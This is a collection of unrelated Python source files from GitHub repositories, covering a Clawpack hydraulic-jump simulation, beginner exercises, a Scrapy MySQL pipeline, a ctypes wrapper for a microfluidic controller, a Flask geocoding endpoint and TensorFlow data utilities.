\"Friction source term: -cf u / h. This version is for Classic.\"\n cf = state.problem_data['cf']\n q = state.q\n h = q[0,:,:]\n u = q[1,:,:]/h\n v = q[2,:,:]/h\n\n q[1,:,:] = q[1,:,:] - dt*cf*u/h\n q[2,:,:] = q[2,:,:] - dt*cf*v/h\n \ndef setup(h0=0.5, u0=0.75, h_inf=0.15, g=1., num_cells_r=100,\n num_cells_theta=100, tfinal=10,\n solver_type='classic', num_output_times=100,\n boundary='subcritical', outdir='./_output', friction=False,\n friction_coeff=0.01, F_bdy=0.1, use_petsc=True, \n kalpha=1./3, kbeta=1./3, kepsilon=1.e-3):\n \n import shallow_quad_hllemcc_2D\n if use_petsc:\n from clawpack import petclaw as pyclaw\n else:\n from clawpack import pyclaw\n import shallow_quad_hllemcc_2D\n\n if solver_type == 'classic':\n solver = pyclaw.ClawSolver2D(shallow_quad_hllemcc_2D)\n solver.cfl_max = 0.5\n solver.cfl_desired = 0.45\n solver.num_eqn = 3\n solver.num_waves = 3\n solver.fwave = False\n solver.dimensional_split=False\n solver.transverse_waves = 1 #2\n elif solver_type == 'sharpclaw':\n solver = pyclaw.SharpClawSolver2D(shallow_quad_hllemcc_2D)\n\n solver.num_eqn = 3\n solver.num_waves = 3\n solver.fwave = False\n\n # Periodic BCs in theta direction\n solver.bc_lower[1] = pyclaw.BC.periodic\n solver.bc_upper[1] = pyclaw.BC.periodic\n solver.aux_bc_lower[1] = pyclaw.BC.periodic\n solver.aux_bc_upper[1] = pyclaw.BC.periodic\n\n solver.aux_bc_lower[0] = pyclaw.BC.extrap\n solver.aux_bc_upper[0] = pyclaw.BC.extrap\n\n # Jet at inner boundary\n solver.bc_lower[0] = pyclaw.BC.custom\n solver.user_bc_lower = jet\n\n if boundary == 'outflow':\n if friction == False:\n raise Exception('Either friction or subcritical outflow is required to produce a jump.')\n solver.bc_upper[0] = pyclaw.BC.extrap\n elif boundary == 'subcritical': # subcritical boundary condition\n solver.bc_upper[0] = pyclaw.BC.custom\n solver.user_bc_upper = subsonic_boundary_upper\n elif boundary == 'wall':\n solver.bc_upper[0] = pyclaw.BC.wall\n\n if friction:\n solver.step_source = step_friction\n solver.source_split = 1\n\n r = pyclaw.Dimension(r_lower,r_upper,num_cells_r,name='r')\n theta = pyclaw.Dimension(theta_lower,theta_upper,num_cells_theta,name='theta')\n domain = pyclaw.Domain([r,theta])\n 
domain.grid.mapc2p = mapc2p_annulus\n\n state = pyclaw.State(domain,3,7)\n \n rc, thetac = state.p_centers\n \n state.problem_data['r0'] = r_lower\n state.problem_data['h0'] = h0\n state.problem_data['u0'] = u0\n state.problem_data['grav'] = g # Gravitational force\n state.problem_data['kalpha'] = kalpha # Kemm's alpha\n state.problem_data['kbeta'] = kbeta # Kemm's beta\n state.problem_data['kepsilon'] = kepsilon # Kemm's epsilon\n state.problem_data['F_bdy'] = F_bdy\n state.problem_data['cf'] = friction_coeff\n\n a_x, a_y, length_left, b_x, b_y, length_bottom, area = compute_geometry(state.grid)\n\n state.aux[0,:,:] = a_x\n state.aux[1,:,:] = a_y\n state.aux[2,:,:] = length_left\n state.aux[3,:,:] = b_x\n state.aux[4,:,:] = b_y\n state.aux[5,:,:] = length_bottom\n state.aux[6,:,:] = area\n state.index_capa = 6 # aux[6,:,:] holds the capacity function\n\n \n state.q[0,:,:] = 0.15 + 0.1*np.random.rand(*state.q[0,:,:].shape)\n state.q[1,:,:] = 0.\n state.q[2,:,:] = 0.\n\n #===========================================================================\n # Set up controller and controller parameters\n #===========================================================================\n claw = pyclaw.Controller()\n claw.tfinal = tfinal\n claw.solution = pyclaw.Solution(state,domain)\n claw.solver = solver\n claw.num_output_times = num_output_times\n claw.outdir = outdir\n if num_cells_r < 400:\n claw.keep_copy = True\n #claw.output_format = None\n else:\n claw.keep_copy = False\n claw.setplot = setplot\n\n return claw\n\ndef setplot(plotdata):\n \"\"\" \n Plot solution using VisClaw.\n \"\"\"\n from mapc2p import mapc2p\n import numpy as np\n from clawpack.visclaw import colormaps\n\n plotdata.clearfigures() # clear any old figures,axes,items data\n plotdata.mapc2p = mapc2p\n \n # Figure for contour plot\n plotfigure = plotdata.new_plotfigure(name='contour', figno=0)\n\n # Set up for axes in this figure:\n plotaxes = plotfigure.new_plotaxes()\n plotaxes.xlimits = 'auto'\n plotaxes.ylimits = 'auto'\n plotaxes.title = 'q[0]'\n plotaxes.scaled = True\n\n # Set up for item on these axes:\n plotitem = plotaxes.new_plotitem(plot_type='2d_contour')\n plotitem.plot_var = 0\n plotitem.contour_levels = np.linspace(0., 1., 10)\n plotitem.contour_colors = 'k'\n plotitem.patchedges_show = 1\n plotitem.MappedGrid = True\n\n # Figure for pcolor plot\n plotfigure = plotdata.new_plotfigure(name='q[0]', figno=1)\n\n # Set up for axes in this figure:\n plotaxes = plotfigure.new_plotaxes()\n plotaxes.xlimits = 'auto'\n plotaxes.ylimits = 'auto'\n plotaxes.title = 'q[0]'\n plotaxes.scaled = True\n\n # Set up for item on these axes:\n plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')\n plotitem.plot_var = 0\n plotitem.pcolor_cmap = colormaps.red_yellow_blue\n plotitem.pcolor_cmin = 0.\n plotitem.pcolor_cmax = 1.\n plotitem.add_colorbar = True\n plotitem.MappedGrid = True\n\n # Figure for pcolor y-momentum plot\n plotfigure = plotdata.new_plotfigure(name='rho*v', figno=2)\n\n # Set up for axes in this figure:\n plotaxes = plotfigure.new_plotaxes()\n plotaxes.xlimits = 'auto'\n plotaxes.ylimits = 'auto'\n plotaxes.title = 'q[2]'\n plotaxes.scaled = True\n\n # Set up for item on these axes:\n plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')\n plotitem.plot_var = 2\n plotitem.pcolor_cmap = colormaps.red_yellow_blue\n plotitem.pcolor_cmin = -1.\n plotitem.pcolor_cmax = 1.\n plotitem.add_colorbar = True\n plotitem.MappedGrid = True\n\n\n return plotdata\n\nif __name__ == \"__main__\":\n from clawpack.pyclaw.util import 
run_app_from_main\n    claw = run_app_from_main(setup,setplot)\n","repo_name":"ketch/circular_hydraulic_jump","sub_path":"hydraulic_jump_2D_annulus.py","file_name":"hydraulic_jump_2D_annulus.py","file_ext":"py","file_size_in_byte":11837,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"}
{"seq_id":"2918530932","text":"\"\"\"\nExercise 6.2 - Complete the fatorial function below, which receives an integer k,\nk >= 0, as a parameter and returns k!.\n\nWrite only the body of the function. Note that the code already includes calls to the\nfatorial function so that you can test it.\n\ndef fatorial(k):\n    '''(int) -> int\n\n    Receives an integer k and returns the value of k!\n\n    Precondition: assumes k is a non-negative integer.\n    '''\n\n    k_fat = 1\n\n    # COMPLETE THIS FUNCTION\n\n    return k_fat\n\n# tests\nprint(\"0! =\", fatorial(0))\nprint(\"1! =\", fatorial(1))\nprint(\"5! =\", fatorial(5))\nprint(\"17! =\", fatorial(17))\n\"\"\"\ndef fatorial(k):\n    '''(int) -> int\n\n    Receives an integer k and returns the value of k!\n\n    Precondition: assumes k is a non-negative integer.\n    '''\n\n    k_fat = 1\n    count = 1\n    while count < k:\n        count += 1\n        k_fat *= count\n\n    total_fatorial = k_fat\n    return total_fatorial\n\n\n# tests\nprint(\"0! =\", fatorial(0))\nprint(\"1! =\", fatorial(1))\nprint(\"5! =\", fatorial(5))\nprint(\"17! =\", fatorial(17))","repo_name":"Lapetina/Python_coursera","sub_path":"semana5/lista_exercicios_4/leitura_funcoes/fatorial_exercicio_6_2.py","file_name":"fatorial_exercicio_6_2.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"27433929325","text":"def draw_Line(tick_length,tick_label=''):\n    \"\"\"\n    Draw one line with given tick length (followed by optional label).\n    \"\"\"\n    line = '-' * tick_length\n    if tick_label:\n        line += ' ' + tick_label\n    print (line)\n    \ndef draw_Interval(central_length):\n    \"\"\"\n    Draw tick interval based upon a central tick length\n    \"\"\"\n    if central_length > 0:                  # stop when length drops to 0\n        draw_Interval(central_length-1)     # recursively draw top ticks\n        draw_Line(central_length)           # draw center tick\n        draw_Interval(central_length-1)     # recursively draw bottom ticks\n    \ndef draw_Euler(num_inches,major_length):\n    \"\"\"\n    Draw English ruler with given number of inches, major tick length\n    \"\"\"\n    draw_Line(major_length,'0')             # draw inch 0 line\n    for j in range(1,1+num_inches):\n        draw_Interval(major_length-1)       # draw interior ticks for inch\n        draw_Line(major_length,str(j))      # draw inch j line and label\n    \n    \n#Code Fragment 4.2: A recursive implementation of a function that draws a ruler
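\n\n# Editor's note, a hedged usage sketch that is not in the original file: e.g.\n# draw_Euler(2, 4) prints a two-inch ruler whose whole-inch lines are four dashes long.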
","repo_name":"zhuhanqing/Data-Structures-Algorithms-Goodrich","sub_path":"Chapter04_Recursion/draw_English_Ruler.py","file_name":"draw_English_Ruler.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"74195662012","text":"#\n# classifiedad/api/serializers.py\n#\n\nfrom rest_framework import serializers\n\nfrom classifiedad.models import ClassifiedAd, ClassifiedAdImage\n\n\nclass ClassifiedAdImageSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = ClassifiedAdImage\n        fields = ('url',)\n\n\nclass ClassifiedAdSerializer(serializers.ModelSerializer): \n    images = ClassifiedAdImageSerializer(many=True, read_only=True) \n    \n    class Meta:\n        model = ClassifiedAd \n        \n        fields = ('id', 'fabrication_year', 'model_year', 'sales_phrase',\n                  'mileage', 'is_new', 'color', 'price', 'images', \n                  'doc_ok', 'accept_exchange', 'accept_new_offer',)\n    \n    def to_representation(self, instance):\n        representation = super().to_representation(instance)\n\n        representation['brand'] = instance.model.brand.brand\n        representation['model'] = instance.model.model\n\n        try:\n            representation['model_version'] = instance.model_version.version \n        except AttributeError:\n            representation['model_version'] = \"\" \n\n        return representation","repo_name":"daniel-armbrust/oci-motando-proj","sub_path":"webapp/motando/classifiedad/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"12394195883","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nfrom scrapy.pipelines.images import ImagesPipeline\nimport json,pymysql\n\nclass ProPipeline(object):\n    def process_item(self, item, spider):\n        return item\n# Custom image pipeline that also stores the saved image filenames on the item\nclass BaiheImagesPipeline(ImagesPipeline):\n    def item_completed(self, results, item, info):\n        pic_pathurl = []\n        for res in results:\n            if res[0]:  # download succeeded\n                pic_pathurl.append(res[1]['path'].replace('full/', '', 1))\n                print(res[1]['path'])\n        pic_pathurl = ','.join(pic_pathurl)\n        item['pic_pathurl'] = pic_pathurl\n        return item\n\n# Pipeline that saves items into the MySQL database\nclass BaiheMysqlPipeline(object):\n    def open_spider(self,spider):\n        self.con = pymysql.connect('127.0.0.1','root','123456','reptile',charset='utf8')\n        self.cursor = self.con.cursor()\n    def process_item(self,item,spider):\n        sql,data = item.get_sql()\n        try:\n            self.cursor.execute(sql,data)\n            self.con.commit()\n        except Exception as e:\n            self.con.rollback()\n            print('============================ error ===========================')\n            print(e)\n            print('=============================='+item[\"one_url\"]+'=============================')\n\n        return item\n    def close_spider(self,spider):\n        self.cursor.close()\n        self.con.close()\n","repo_name":"theme716/small-routine","sub_path":"insect/scrapy_2/pro/pro/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"20339530452","text":"import matplotlib.pyplot as plt\nfilename = \"./out.txt\"\n\nepoch = []\nacc = []\nrmse = []\n\nwith open(filename, \"r\") as f:\n    for eachline in f.readlines():\n        line = eachline.split(' ')\n        \n        epoch.append(int(line[0]) - 1);\n        acc.append(line[1]);\n        rmse.append(line[2]);\n\nplt.figure(1)\nplt.subplot(121)\nplt.plot(epoch, acc)\nplt.xlabel('No. of iterations')\nplt.ylabel('Accuracy')\nplt.title('Accuracy')\nplt.grid(True)\n#legend(loc = 0)\n#close()\n\n#plt.figure(figsize = (8,6), dpi = 80, num = 1, facecolor = \"white\")\nplt.subplot(122)\nplt.plot(epoch, rmse)\nplt.xlabel('No. of iterations')\nplt.ylabel('RMSE')\nplt.title('RMSE')\nplt.grid(True)\n#legend(loc = 0)\n#close()\n\nplt.show()\n","repo_name":"zhqwerty/DMF-MPI","sub_path":"Output/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"42308803553","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nWrapper for the shared library. 
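A hedged editor's sketch of the intended\ncall order (assuming exactly one device is attached):\n\n    err, serials = mfcs_detect()\n    handle = mfcs_initialization(serials[0])\n    err, pressure, ts = mfcs_cur_pressure(handle, 1)\n    mfcs_close(handle)\n\n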
Functions that return more than one value will\nreturn a tuple containing all of the outputs in order, starting from the\nerror code.\n\"\"\"\n\n#\"\"\"\nimport sys\nimport platform\nimport os\nimport pkg_resources\nimport ctypes\nfrom ctypes import byref, c_uint8, c_uint16, c_uint64, c_float, POINTER, c_bool, c_char_p, c_char\n\nis_64_bits = sys.maxsize > 2 ** 32\n\nif sys.platform.startswith(\"win32\"):\n libclass = ctypes.CDLL\n lib_relative_path = ('shared', 'windows')\n if is_64_bits:\n lib_name = \"pgmfc_64.dll\"\n else:\n lib_name = \"pgmfc_32.dll\"\nelif sys.platform.startswith(\"linux\"):\n sharedObjectVersion = \"2.0.0\"\n libclass = ctypes.CDLL\n lib_name = \"pgmfc_x86_64.so\"\n if platform.machine().lower().startswith('arm'):\n lib_relative_path = ('shared', 'pi')\n else:\n lib_relative_path = ('shared', 'linux')\nelse:\n raise NotImplementedError(\"SDK not available on \" + sys.platform)\n#\"\"\"\n\n# import Lib.mfc_controls as lib\nresource_package = __name__\nresource_path = '/'.join(lib_relative_path)\n# resource_path = r\"F:\\bitbucket\\FlowSDK\\pgmfc\\x64\\Release\"\nlibpath = pkg_resources.resource_filename(resource_package, resource_path)\n# print libpath, lib_name\nlib = libclass(os.path.join(libpath, lib_name))\n\n# print lib\n\nlib.mfcs_detect.argtypes = [POINTER(c_uint16)]\nlib.mfcs_initialization.argtypes = [c_uint16]\nlib.mfcs_close.argtypes = [c_uint64]\nlib.mfcs_get_serial.argtypes = [c_uint64, POINTER(c_uint16)]\nlib.mfcs_frimwareversion.argtypes = [c_uint64, c_char_p]\n\nlib.mfcs_monitor_start.argtypes = [c_uint64, c_uint16]\nlib.mfcs_monitor_stop.argtypes = [c_uint64]\n\nlib.mfcs_stopEmergency.argtypes = [c_uint64]\n\nlib.mfcs_set_params.argtypes = [c_uint64, c_uint16, c_uint16, c_float, c_float, c_float, c_float, c_float, c_bool]\nlib.mfcs_set_params_flowrate.argtypes = [c_uint64, c_uint16, c_uint16, c_float, c_float, c_float, c_float, c_float, c_bool]\n\nlib.mfcs_purge_on.argtypes = [c_uint64, c_uint16]\nlib.mfcs_purge_off.argtypes = [c_uint64, c_uint16]\n\nlib.mfcs_getCurPressure.argtypes = [c_uint64, c_uint16, POINTER(c_float), POINTER(c_uint16)]\nlib.mfcs_getCurFlowrate.argtypes = [c_uint64, c_uint16, POINTER(c_float), POINTER(c_uint16)]\nlib.mfcs_getCurFlowrate_Liquid.argtypes = [c_uint64, c_uint16, POINTER(c_float), POINTER(c_uint16)]\nlib.mfcs_getCurFlowtotalizer.argtypes = [c_uint64, c_uint16, POINTER(c_float), POINTER(c_uint16)]\n\nlib.mfcs_operateDigitalOutputs.argtypes = [c_uint64, c_uint16, c_uint16, c_uint16, c_uint16, c_uint16]\nlib.mfcs_queryDigitalIOStates.argtypes = [c_uint64, POINTER(c_uint16)]\n\nlib.mfcs_checkFlowmeter.argtypes = [c_uint64, c_uint16]\nlib.mfcs_queryFlowmeterInfo.argtypes = [c_uint64, c_uint16, POINTER(c_bool), c_char_p]\n\nlib.mfcs_queryRotaryAddress.argtypes = [c_uint64, c_uint16, c_uint16]\nlib.mfcs_rotaryReset.argtypes = [c_uint64, c_uint16, c_uint16]\nlib.mfcs_queryRotaryCurPos.argtypes = [c_uint64, c_uint16, c_uint16]\nlib.mfcs_rotarySwitchTo.argtypes = [c_uint64, c_uint16, c_uint16, c_uint16]\n\ndef mfcs_detect():\n serial_number_list = (ctypes.c_uint16 * 10)(*([0] * 10))\n c_error = c_uint8(lib.mfcs_detect(serial_number_list))\n serial_number_list = list(filter(None, serial_number_list))\n return (c_error.value, serial_number_list)\n\ndef mfcs_get_handler(serial_number):\n return c_uint64(lib.mfcs_get_handler(c_uint16(serial_number)))\n\ndef mfcs_initialization(serial_number):\n value = lib.mfcs_initialization(serial_number)\n return c_uint64(value)\n\ndef mfcs_close(handle):\n c_error = 
c_uint8(lib.mfcs_close(handle))\n return c_error.value\n\ndef mfcs_get_serial(handle):\n serial = c_uint16(0)\n c_error = c_uint8(lib.mfcs_get_serial(handle, byref(serial)))\n return (c_error.value, serial.value)\n\ndef mfcs_firmwareversion(handle):\n version = c_char_p('')\n c_error = c_uint8(lib.mfcs_frimwareversion(handle, version))\n return (c_error.value, version.value)\n\ndef mfcs_monitor_start(handle, span=100):\n c_error = c_uint8(lib.mfcs_monitor_start(handle, c_uint16(span)))\n return c_error.value\n\ndef mfcs_monitor_stop(handle):\n c_error = c_uint8(lib.mfcs_monitor_stop(handle))\n return c_error.value\n\ndef mfcs_stopEmergency(handle):\n c_error = c_uint8(lib.mfcs_stopEmergency(handle))\n return c_error.value\n\ndef mfcs_purge_on(handle, channel):\n c_error = c_uint8(lib.mfcs_purge_on(handle, c_uint16(channel)))\n return c_error.value\n\ndef mfcs_purge_off(handle, channel):\n c_error = c_uint8(lib.mfcs_purge_off(handle, c_uint16(channel)))\n return c_error.value\n\ndef mfcs_set_params(handle, channel, type=1, peak=2.0, trough=2.0, period=10, duty=0.25,\n runtime=50, bNormalOpen=False):\n c_error = c_uint8(lib.mfcs_set_params(handle, c_uint16(channel),\n c_uint16(type), c_float(peak),\n c_float(trough), c_float(period), c_float(duty),\n c_float(runtime), c_bool(bNormalOpen)))\n return c_error.value\n\ndef mfcs_set_params_flowrate(handle, channel, type=1, peak=100, trough=50, period=10, duty=0.25,\n runtime=50, bNormalOpen=False):\n c_error = c_uint8(lib.mfcs_set_params_flowrate(handle, c_uint16(channel),\n c_uint16(type), c_float(peak),\n c_float(trough), c_float(period), c_float(duty),\n c_float(runtime), c_bool(bNormalOpen)))\n return c_error.value\n\n\ndef mfcs_operateDigitalOutputs(handle, idPort, itype, polarity, peroid, pulse):\n c_error = c_uint8(lib.mfcs_operateDigitalOutputs(handle, c_uint16(idPort), c_uint16(itype),\n c_uint16(polarity),\n c_uint16(peroid), c_uint16(pulse)))\n return c_error.value\n\ndef mfcs_queryDigitalIOStates(handle):\n states_list = (ctypes.c_uint16 * 8)(*([0] * 8))\n c_error = c_uint8(lib.mfcs_queryDigitalIOStates(handle, states_list))\n states_list = list(states_list)\n # states_list = list(filter(None, states_list))\n return (c_error.value, states_list)\n\ndef mfcs_checkFlowmeterInfo(handle, channel):\n c_error = c_uint8(lib.mfcs_checkFlowmeterInfo(handle, c_uint16(channel)))\n return c_error.value\n\ndef mfcs_queryFlowmeterInfo(handle, channel):\n connected = c_bool(False)\n model = c_char_p('')\n c_error = c_uint8(lib.mfcs_queryFlowmeterInfo(handle, c_uint16(channel), byref(connected), model))\n return (c_error.value, connected.value, model.value)\n\n# region rotary valves\ndef mfcs_queryRotaryAddress(handle, switchType, mountID):\n c_error = c_uint8(lib.mfcs_queryRotaryAddress(handle, switchType, mountID))\n return c_error.value\n\ndef mfcs_rotaryReset(handle, switchType, mountID):\n c_error = c_uint8(lib.mfcs_rotaryReset(handle, switchType, mountID))\n return c_error.value\n\ndef mfcs_queryRotaryCurPos(handle, switchType, mountID):\n c_error = c_uint8(lib.mfcs_queryRotaryCurPos(handle, switchType, mountID))\n return c_error.value\n\ndef mfcs_rotarySwitchTo(handle, switchType, mountID, portID):\n c_error = c_uint8(lib.mfcs_rotarySwitchTo(handle, switchType, mountID, portID))\n return c_error.value\n# endregion\n\n# region read current sensor data. 
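Each getter returns a tuple of (error, value, 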
timestamp)\ndef mfcs_cur_pressure(handle, channel):\n    pressure = c_float(0)\n    timestamp = c_uint16(0)\n    c_error = c_uint8(lib.mfcs_getCurPressure(handle, c_uint16(channel), byref(pressure), byref(timestamp)))\n    return (c_error.value, pressure.value, timestamp.value)\n\ndef mfcs_cur_airflowrate(handle, channel):\n    flowrate = c_float(0)\n    timestamp = c_uint16(0)\n    c_error = c_uint8(lib.mfcs_getCurFlowrate(handle, c_uint16(channel), byref(flowrate), byref(timestamp)))\n    return (c_error.value, flowrate.value, timestamp.value)\n\ndef mfcs_cur_liquidflowrate(handle, channel):\n    flowrate = c_float(0)\n    timestamp = c_uint16(0)\n    c_error = c_uint8(lib.mfcs_getCurFlowrate_Liquid(handle, c_uint16(channel), byref(flowrate), byref(timestamp)))\n    return (c_error.value, flowrate.value, timestamp.value)\n\ndef mfcs_cur_liquidflowtotalizer(handle, channel):\n    flowtotalizer = c_float(0)\n    timestamp = c_uint16(0)\n    c_error = c_uint8(lib.mfcs_getCurFlowtotalizer(handle, c_uint16(channel), byref(flowtotalizer), byref(timestamp)))\n    return (c_error.value, flowtotalizer.value, timestamp.value)\n# endregion\n\n\n","repo_name":"ccmeyer/printing-platform","sub_path":"Scripts/Precigenome/PGMFC/control_c.py","file_name":"control_c.py","file_ext":"py","file_size_in_byte":8468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"20646715005","text":"from flask import Flask, jsonify, request\nimport flask_restful\nfrom flask_cors import CORS\nimport urllib.parse\nimport urllib.request\nimport jsons\nimport os\n\napp = Flask(__name__)\nCORS(app) \napi = flask_restful.Api(app)\n\nclass test(flask_restful.Resource):\n    def get(self):\n        return {\"test\": \"location of test\"}\n\nclass init(flask_restful.Resource):\n    def get(self):\n        return {\"init\": \"location of address \"}\n\nclass location(flask_restful.Resource):\n    def get(self):\n\n        args = request.args\n        address = request.args.get('address', default=\"Washington DC\", type = str)\n\n        returnurl = 'https://nominatim.openstreetmap.org/search/' + urllib.parse.quote(address) +'?format=json'\n        print(returnurl)\n        response = urllib.request.urlopen(returnurl)\n        charset = response.info().get_param('charset') or 'utf-8'\n        data = jsons.loads(response.read().decode(charset))\n        wresponse = \"Latitude = \" + data[0][\"lat\"]\n        wresponse += \"\\nLongitude = \" + data[0][\"lon\"]\n\n        return {address: wresponse}\n\n    def post(self):\n        json_data = request.get_json(force=True)\n        firstname = json_data['firstname']\n        lastname = json_data['lastname']\n        return jsonify(firstname=firstname, lastname=lastname)\n\napi.add_resource(init, '/init')\napi.add_resource(test, '/test')\napi.add_resource(location, '/location')\n\nif __name__ == '__main__':\n    port = os.environ.get('FLASK_PORT') or 8080\n    port = int(port)\n\n    app.run(port=port,host='0.0.0.0')\n\n","repo_name":"jayant51/location-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"14248878314","text":"# algorithms\nnumbers=[2,4,6,7,11,44,12,56,23,25,67]\nres=4 in numbers\nprint(res)\n\nfor i in numbers:\n    if i==2:\n        print('$$$',[])\n        break\n# hacker rank","repo_name":"FireFox5/FireMonkey-","sub_path":"second Month/seventh lesson 02.09.2021/7.1.py","file_name":"7.1.py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"27202158985","text":"\"\"\"General 
utility functions\"\"\"\nimport os\n# import cv2\nimport json\nimport shutil\nimport logging\nimport tensorflow as tf\nfrom util.label_map_util import get_label_map_dict\n\n\nclass Params():\n    \"\"\"Class that loads hyperparameters from a json file.\n\n    Example:\n    ```\n    params = Params(json_path)\n    print(params.learning_rate)\n    params.learning_rate = 0.5  # change the value of learning_rate in params\n    ```\n    \"\"\"\n\n    def __init__(self, json_path):\n        self.update(json_path)\n\n    def save(self, json_path):\n        \"\"\"Saves parameters to json file\"\"\"\n        with open(json_path, 'w') as f:\n            json.dump(self.__dict__, f, indent=4)\n\n    def update(self, json_path):\n        \"\"\"Loads parameters from json file\"\"\"\n        with open(json_path) as f:\n            params = json.load(f)\n            self.__dict__.update(params)\n\n    @property\n    def dict(self):\n        \"\"\"Gives dict-like access to Params instance by `params.dict['learning_rate']`\"\"\"\n        return self.__dict__\n\n\ndef set_logger(log_path):\n    \"\"\"Sets the logger to log info in terminal and file `log_path`.\n\n    In general, it is useful to have a logger so that every output to the terminal is saved\n    in a permanent file. Here we save it to `model_dir/train.log`.\n\n    Example:\n    ```\n    logging.info(\"Starting training...\")\n    ```\n\n    Args:\n        log_path: (string) where to log\n    \"\"\"\n    logger = logging.getLogger()\n    logger.setLevel(logging.INFO)\n\n    if not logger.handlers:\n        # Logging to a file\n        file_handler = logging.FileHandler(log_path)\n        file_handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s: %(message)s'))\n        logger.addHandler(file_handler)\n\n        # Logging to console\n        stream_handler = logging.StreamHandler()\n        stream_handler.setFormatter(logging.Formatter('%(message)s'))\n        logger.addHandler(stream_handler)\n\n\ndef save_dict_to_json(d, json_path):\n    \"\"\"Saves dict of floats in json file\n\n    Args:\n        d: (dict) of float-castable values (np.float, int, float, etc.)\n        json_path: (string) path to json file\n    \"\"\"\n    with open(json_path, 'w') as f:\n        # We need to convert the values to float for json (it doesn't accept np.array, np.float, )\n        d = {k: float(v) for k, v in d.items()}\n        json.dump(d, f, indent=4)\n\n\ndef get_ab_path(root_path):\n    # Collect the absolute paths of all .jpg files under the given folder\n    image_paths = []\n    # c_folder: full path of the current folder; subfolder: its subfolders; files: its files\n    for c_folder, subfolder, files in os.walk(root_path):\n        for file in files:\n            if file.endswith('.jpg'):\n                image = os.path.join(c_folder, file)\n                # print(image)\n                image_paths.append(image)\n    return image_paths\n\n\ndef get_data(data_dir, label_map_path):\n    label_map = get_label_map_dict(label_map_path)  # label_map[name:id], id begins with 1\n    image_path_list = []\n    image_label_list = []\n    data_num = 0\n    for cur_folder, sub_folders, sub_files in os.walk(data_dir):\n        for file in sub_files:\n            if file.endswith('jpg'):\n                data_num += 1\n                image_path_list.append(os.path.join(cur_folder, file))\n                image_label_list.append(label_map[os.path.split(cur_folder)[-1]])\n    print('image_num:', data_num)\n    data_tuple = (image_path_list, image_label_list)\n    return data_tuple\n\n\ndef get_train_data(data_dir, label_map_path):\n    label_map = get_label_map_dict(label_map_path)  # label_map[name:id], id begins with 1\n    image_path_dict = {}\n    data_num = 0\n    for cur_folder, sub_folders, sub_files in os.walk(data_dir):\n        for file in sub_files:\n            if file.endswith('jpg'):\n                data_num += 1\n                label_id = label_map[os.path.split(cur_folder)[-1]]\n                image_path_dict.setdefault(label_id, [])\n                image_path_dict[label_id].append(os.path.join(cur_folder, file))\n\n    print('image_num:', data_num)\n    return image_path_dict\n\n\ndef get_dict(root_path):\n    # Use each subfolder name under root_path as a key and the full paths of its files as the value\n    truth_dict = {}\n    for c_folder, subfolder, files in os.walk(root_path):\n        image_list = []\n        for file in files:\n            if file.endswith('.jpg'):\n                image = os.path.join(c_folder, file)\n                image_list.append(image)\n        label = os.path.split(c_folder)[-1]\n        truth_dict[label] = image_list\n    return truth_dict\n\n\ndef image_size(img_dir):\n    import os\n    import cv2\n\n    small_num = 0\n    mid_num = 0\n    large_num = 0\n    for cur_folder, sub_folders, sub_files in os.walk(img_dir):\n        for file in sub_files:\n            if file.endswith('jpg'):\n                img = cv2.imread(os.path.join(cur_folder, file))\n                pixel_areas = img.shape[0] * img.shape[1]\n                if pixel_areas < 3600:\n                    small_num += 1\n                elif pixel_areas < 8100:\n                    mid_num += 1\n                else:\n                    large_num += 1\n\n    print('small num:', small_num)\n    print('mid_num:', mid_num)\n    print('large_num:', large_num)\n\n\ndef get_variable_to_restore(vars_dict, checkpoint_path, include_global_step=False):\n    \"\"\"\n\n    :param vars_dict:\n    :param checkpoint_path:\n    :param include_global_step:\n    :return:\n    \"\"\"\n    if isinstance(vars_dict, list):\n        vars_map = {v.op.name: v for v in vars_dict}\n    elif isinstance(vars_dict, dict):\n        vars_map = vars_dict\n    else:\n        raise ValueError(\"`vars_dict` is expected to be a list or dict\")\n\n    ckpt_reader = tf.train.NewCheckpointReader(checkpoint_path)\n    ckpt_vars_to_shape_map = ckpt_reader.get_variable_to_shape_map()\n    if not include_global_step:\n        ckpt_vars_to_shape_map.pop(tf.GraphKeys.GLOBAL_STEP, None)\n    var_in_ckpt = {}\n    for var_name, var in sorted(vars_map.items()):\n        if var_name in ckpt_vars_to_shape_map:\n            if var.shape.as_list() == ckpt_vars_to_shape_map[var_name]:\n                var_in_ckpt[var_name] = var\n            else:\n                logging.warning('Variable [%s] is available in checkpoint, but has an '\n                                'incompatible shape with model variable. Checkpoint '\n                                'shape: [%s], model variable shape: [%s]. 
